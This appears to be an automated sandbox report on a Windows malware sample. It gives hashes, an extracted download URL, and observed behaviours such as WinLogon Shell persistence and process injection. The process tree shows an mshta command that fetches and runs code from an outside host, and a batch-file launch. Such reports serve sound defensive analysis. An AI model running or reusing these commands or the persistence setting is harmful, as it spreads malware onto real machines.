Analysis
-
max time kernel
9s -
max time network
14s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
24/01/2024, 02:04
Static task
static1
Behavioral task
behavioral1
Sample
712805a7852cda5ae9a433c13aab17c1.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
712805a7852cda5ae9a433c13aab17c1.exe
Resource
win10v2004-20231215-en
Errors
General
-
Target
712805a7852cda5ae9a433c13aab17c1.exe
-
Size
3.1MB
-
MD5
712805a7852cda5ae9a433c13aab17c1
-
SHA1
3010f96ee9e545f01903ab1a117a1c705021ffff
-
SHA256
7d99b67304773d0c3c52a472c7469333fcfab81bcbfb5013ac5c7b826342e37a
-
SHA512
910a699fe19a8b2847a52735d41eeca03ce9b118aff0f3fa369006c18553f1991c676ad24ee44fe8a56ebb8ac354aba3f1a080665f2466faff83224655883128
-
SSDEEP
24576:ruRcKvWLVblQVxgfm0pB6Umenrp6+QzoTvbrTF5NfGWicfi:DkperpEIPTF5NfGW
Malware Config
Extracted
http://rtopotr.com/inst.php?id=02909
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Roaming\\hotfix.exe" 712805a7852cda5ae9a433c13aab17c1.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2288 712805a7852cda5ae9a433c13aab17c1.exe 2288 712805a7852cda5ae9a433c13aab17c1.exe 2288 712805a7852cda5ae9a433c13aab17c1.exe 2288 712805a7852cda5ae9a433c13aab17c1.exe 2288 712805a7852cda5ae9a433c13aab17c1.exe 2288 712805a7852cda5ae9a433c13aab17c1.exe 2288 712805a7852cda5ae9a433c13aab17c1.exe 2288 712805a7852cda5ae9a433c13aab17c1.exe 2288 712805a7852cda5ae9a433c13aab17c1.exe 2288 712805a7852cda5ae9a433c13aab17c1.exe 2288 712805a7852cda5ae9a433c13aab17c1.exe 2288 712805a7852cda5ae9a433c13aab17c1.exe 2288 712805a7852cda5ae9a433c13aab17c1.exe 2288 712805a7852cda5ae9a433c13aab17c1.exe 2288 712805a7852cda5ae9a433c13aab17c1.exe 2288 712805a7852cda5ae9a433c13aab17c1.exe 2288 712805a7852cda5ae9a433c13aab17c1.exe 2288 712805a7852cda5ae9a433c13aab17c1.exe 2288 712805a7852cda5ae9a433c13aab17c1.exe 2288 712805a7852cda5ae9a433c13aab17c1.exe 2288 712805a7852cda5ae9a433c13aab17c1.exe 2288 712805a7852cda5ae9a433c13aab17c1.exe 2288 712805a7852cda5ae9a433c13aab17c1.exe 2288 712805a7852cda5ae9a433c13aab17c1.exe 2288 712805a7852cda5ae9a433c13aab17c1.exe 2288 712805a7852cda5ae9a433c13aab17c1.exe 2288 712805a7852cda5ae9a433c13aab17c1.exe 2288 712805a7852cda5ae9a433c13aab17c1.exe 2288 712805a7852cda5ae9a433c13aab17c1.exe 2288 712805a7852cda5ae9a433c13aab17c1.exe 2288 712805a7852cda5ae9a433c13aab17c1.exe 2288 712805a7852cda5ae9a433c13aab17c1.exe 2288 712805a7852cda5ae9a433c13aab17c1.exe 2288 712805a7852cda5ae9a433c13aab17c1.exe 2288 712805a7852cda5ae9a433c13aab17c1.exe 2288 712805a7852cda5ae9a433c13aab17c1.exe 2288 712805a7852cda5ae9a433c13aab17c1.exe 2288 712805a7852cda5ae9a433c13aab17c1.exe 2288 712805a7852cda5ae9a433c13aab17c1.exe 2288 712805a7852cda5ae9a433c13aab17c1.exe 2288 712805a7852cda5ae9a433c13aab17c1.exe 2288 712805a7852cda5ae9a433c13aab17c1.exe 2288 712805a7852cda5ae9a433c13aab17c1.exe 2288 712805a7852cda5ae9a433c13aab17c1.exe 2288 712805a7852cda5ae9a433c13aab17c1.exe 2288 712805a7852cda5ae9a433c13aab17c1.exe 2288 712805a7852cda5ae9a433c13aab17c1.exe 2288 712805a7852cda5ae9a433c13aab17c1.exe 2288 712805a7852cda5ae9a433c13aab17c1.exe 2288 712805a7852cda5ae9a433c13aab17c1.exe 2288 712805a7852cda5ae9a433c13aab17c1.exe 2288 712805a7852cda5ae9a433c13aab17c1.exe 2288 712805a7852cda5ae9a433c13aab17c1.exe 2288 712805a7852cda5ae9a433c13aab17c1.exe 2288 712805a7852cda5ae9a433c13aab17c1.exe 2288 712805a7852cda5ae9a433c13aab17c1.exe 2288 712805a7852cda5ae9a433c13aab17c1.exe 2288 712805a7852cda5ae9a433c13aab17c1.exe 2288 712805a7852cda5ae9a433c13aab17c1.exe 2288 712805a7852cda5ae9a433c13aab17c1.exe 2288 712805a7852cda5ae9a433c13aab17c1.exe 2288 712805a7852cda5ae9a433c13aab17c1.exe 2288 712805a7852cda5ae9a433c13aab17c1.exe 2288 712805a7852cda5ae9a433c13aab17c1.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeShutdownPrivilege 2288 712805a7852cda5ae9a433c13aab17c1.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2288 712805a7852cda5ae9a433c13aab17c1.exe 2288 712805a7852cda5ae9a433c13aab17c1.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 2288 wrote to memory of 1740 2288 712805a7852cda5ae9a433c13aab17c1.exe 28 PID 2288 wrote to memory of 1740 2288 712805a7852cda5ae9a433c13aab17c1.exe 28 PID 2288 wrote to memory of 1740 2288 712805a7852cda5ae9a433c13aab17c1.exe 28 PID 2288 wrote to memory of 1740 2288 712805a7852cda5ae9a433c13aab17c1.exe 28 PID 2288 wrote to memory of 1788 2288 712805a7852cda5ae9a433c13aab17c1.exe 29 PID 2288 wrote to memory of 1788 2288 712805a7852cda5ae9a433c13aab17c1.exe 29 PID 2288 wrote to memory of 1788 2288 712805a7852cda5ae9a433c13aab17c1.exe 29 PID 2288 wrote to memory of 1788 2288 712805a7852cda5ae9a433c13aab17c1.exe 29
Processes
-
C:\Users\Admin\AppData\Local\Temp\712805a7852cda5ae9a433c13aab17c1.exe"C:\Users\Admin\AppData\Local\Temp\712805a7852cda5ae9a433c13aab17c1.exe"1⤵
- Modifies WinLogon for persistence
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2288 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" http://rtopotr.com/inst.php?id=029092⤵
- Modifies Internet Explorer settings
PID:1740
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Roaming\agtyjkj.bat" "2⤵PID:1788
-
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x01⤵PID:2860
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x11⤵PID:2444
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
234B
MD5992c5a8cb96fd6e4e52aebd41ebe5100
SHA1c91d8fd28de2258f491034d47db75269f447c916
SHA25682280aee257e91b20953b8f51a19077999f7ab52c42b558487e661865f6d3f1d
SHA512711f5277f447739b45c4ce0638d125540d986aa34970c7c14f455985d3232d0aa010420aa40b48166e66f5769d3cce5ed78156fc64123e86e3b12ba3aba14344